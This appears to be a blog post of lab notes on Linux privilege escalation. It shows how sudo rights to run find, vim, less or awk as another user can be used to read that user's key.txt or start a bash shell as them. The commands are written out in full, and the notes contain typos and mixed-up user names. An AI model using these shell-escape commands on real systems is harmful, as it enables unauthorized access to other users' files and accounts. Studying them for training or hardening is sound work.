Linux Privilege Escalation

on
  1. Privilege escalation with "sudo -l" and "sudo -u"
    1. With Find command
      1. where i am logged in with varun user; 
      2. but there is another neptune user which holds some sensitive files;
      3. when i checked ' sudo -l '. It showed i can use find command on the behalf of neptune user;
      4. sudo -u neptune find /home/neptune; (it gave me the neptune folder);
      5. sudo -u neptune find /home/neptune -name ' key.txt ' ; ( it gave me the key now i need to read key.txt file);
      6. sudo -u neptune find /home/neptune -name key.txt -exec cat {} \;  
        1. I can use bash and then sh also in the place of cat
    2. With vim command
      1. Vim Commands:
        1. ( i = insert ,
        2. esc = out of insert ,
        3.  :q! = quit without saving ,
        4. :wq = quit and save,
        5. :r / (:r /home/user/key.txt ) = to open file,)
      2. where i am logged in as a varun user;
      3. but there is another user neptune with other sensitive files;
      4. when i checked ' sudo -l '. It showed vim command can be used on neptune behalf;
      5. sudo -u neptune vim /home/neptune key.txt; ( Gave me key with vim open)
      6. Now i can run command like:
        1. sudo -u neptune vim; ( It will open vim for me);
        2. :r /home/neptune/key.txt; this will also output the key.txt file;
      7. I can run vim as a shell too:
        1. sudo -u neptune vim;
        2. :!/bin/bash (press enter); (shell will be started and now I can go inside victim folder as i am a victim now)
    3. With less command
      1. where i am logged in as a varun use;
      2. but there is another user neptunw with other sensitive files;
      3. when i checked ' sudo -l '. It showwd less command can be used on neptune behalf;
      4. sudo -u neptune less /home/neptune key.txt; ( Gave me key )
      5. sudo -u neptune less /etc/passwd (to get a shell, it wil open password file);
      6. press e ; (it will give you examine mode);
      7. Examine: /home/neptune/key.txt .(the sensitive directory and file); It will open vim again.
        1. /bin/bash enter. (find out the senitive file as you are neptune now.)
    4. With awk programming language : it was allowed
      1. where i am logged in as a varun use;
      2. but there is another user neptunw with other sensitive files;
      3. when i checked ' sudo -l '. It showwd less command can be used on neptune behalf;  
      4. sudo -u victim awk '{print $1}' /home/victim/key.txt (gave me the key);
      5. sudo -u victim awk 'BEGIN {system("/bin/bash")}'   (for the shell)

                                  Comments

                                  Post a Comment